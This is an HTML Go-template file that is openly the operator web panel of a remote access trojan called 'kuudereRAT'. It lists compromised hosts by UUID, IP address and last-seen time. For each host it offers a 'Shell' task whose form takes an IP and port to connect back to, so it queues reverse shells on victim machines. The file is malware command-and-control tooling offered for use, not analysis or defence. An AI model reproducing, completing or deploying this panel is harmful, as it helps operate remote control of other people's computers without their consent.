<!DOCTYPE html>
<html>
    <head>
        <title>【 kuudere Web UI 】</title>
        <meta http-equiv="refresh" content="30"/>
        <link rel="stylesheet" type="text/css" href="/static/css/site.css">
        <script type="text/javascript">
        var imageURLs = [
            "/static/img/logo/fight.gif",
            "/static/img/logo/globe.gif",
            "/static/img/logo/globe2.gif",
            "/static/img/logo/mew.gif",
            "/static/img/logo/anime-eyes.gif",
            "/static/img/logo/heartbeat.gif",
            "/static/img/logo/samurai.gif",
        ];
        function getImageTag() {
            var img = '<img src=\"';
            var randomIndex = Math.floor(Math.random() * imageURLs.length);
            img += imageURLs[randomIndex];
            img += '\" class=\"responsive\"/>';
            console.log(img)
            return img;
        }
        </script>
    </head>
    <body>
        <center>
            <div class="logo">
            <!-- should pass image urls from server instead of this copy-pasted code -->
            <script type="text/javascript">
                document.write(getImageTag());
            </script>
            </div>
            <div class="main-view">
            <h1>kuudereRAT PRE-ALPHA Build</h1>
            <p class="lead">Page reloads every 30 seconds.</p>
            <table>
                <tr>
                    <th>&#10032;</th>
                    <th>UUID</th>
                    <th>IP</th>
                    <th>LAST SEEN</th>
                    <th>MODULE</th>
                </tr>
            {{ range $index, $element := . }}
            <tr>
                <td>{{ $index }}</td>
                <td>{{ .Uuid }}</td>
                <td>{{ .Ipaddr }}</td>
                <td>{{ .Ts_last }}</td>
                <td>
                    <select name="task" id="tasks">
                        <option value="#">Select a task</option>
                        <option value="shell">Shell</option>
                    </select>

                <div id="shellModal" class="modal">
                    <div class="modal-content">
                        <h3>Shell</h3>
                        <hr>
                        <p class="lead">Select remote host to connect back to</p>
                        <form method ="post" action="/create_task/{{.Uuid}}">
                        <label>IP Address</label>
                        <input type="text" name="ipaddr"><br>
                        <label>Port</label>
                        <input type="text" name="port"><br>
                        <input type="hidden" name="task_id" value="1">
                        <button type="submit" class="submit-btn">Load</button>
                        </form>
                    </div>
                </div>


                </td>
            </tr>
            {{ end }}
            </table>
            </div>
        </center>
    <script src="/static/js/app.js"></script>
    </body>
</html>